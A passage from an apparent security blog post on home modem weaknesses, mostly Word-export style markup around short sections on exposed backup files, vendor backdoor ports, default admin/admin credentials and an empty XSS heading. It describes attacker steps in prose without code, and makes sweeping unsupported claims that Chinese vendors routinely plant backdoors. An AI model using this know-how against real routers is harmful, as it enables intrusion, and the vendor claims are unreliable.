<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
</div>
<div class="MsoNormal">
<br /></div>
<h4 class="MsoNormal" style="text-align: left;">
0x03: Backups& Backdoors</h4>
<div class="MsoNormal" style="text-align: left;">
All modems include Backup files mainly because of the need to recover the modem to the original state after a reset. However, knowing the direct link to the backup file puts the modem directly in danger. All an attacker has to do is request the backup file and view it; mostly this is juicy plain info that contains passwords, ISP configurations.<br />
<br />
Knowing this however, some vendors try to encrypt the contents that are inside these files. So downloading this would be useless for the attacker. But this isn’t entirely impossible as lots of vendors tend to use weak encryption mechanisms to encrypt backup file. And research done by white hats such as Osanda Malith shows that. He for example provided a PoC tool used to decrypt these rom-0 (Backup) files from most modems, including ZTE and TP-Link.</div>
<div class="MsoNormal" style="text-align: left;">
<br />
Most of the chinese Vendors such as ZTE are banned from the US, one because they being incredibly insecure and two because, they put malicious backdoors to snoop and eavesdrop on individuals and organizations.<br />
<br />
Lots of trusted companies such as TP-Link, Huawei and other chinese companies have a record of placing backdoors in their products. These backdoors are normally in form of open ports which on connecting would provide a reverse shell. The ports are often found to be high in number to make it harder to detect.<br />
<br />
One of such examples can be found <a href="http://sekurak.pl/more-information-about-tp-link-backdoor/" rel="nofollow" target="_blank">here</a>. This lets them capture sensitive files and sometimes sell it for residing countries. This strategy is great one for governments to spy on their citizens as well as for great as a part of a cyber attack against a particular country. So for example: A country could sell cheap backdoored modems to a target country, and in case the modems end up being used on military and sensitive systems, then they have hit a jackpot. </div>
<h4 class="MsoNormal" style="text-align: left;">
0x04: Default Configuration details and Hardcoded Credentials</h4>
<div style="text-align: left;">
Apparently, all if not most modems come with very easy to guess password configurations. Infact, most of them are identical like: username:admin and password: admin. Most people do not change the configuration details and most ISP’s leave this as default.<br />
<br />
This amazingly is a good news for malicious users. Because all they have to do is know the vendor and they can get their hands on it easily using sites such as http://www.routerpasswords.com/ to extract information.</div>
<div style="text-align: left;">
</div>
<h4 style="text-align: left;">
0x05: XSRF and XSS</h4>
<div style="text-align: left;">
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Version>15.00</o:Version>
</o:DocumentProperties>
</xml><![endif]--></div>
<div style="text-align: left;">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
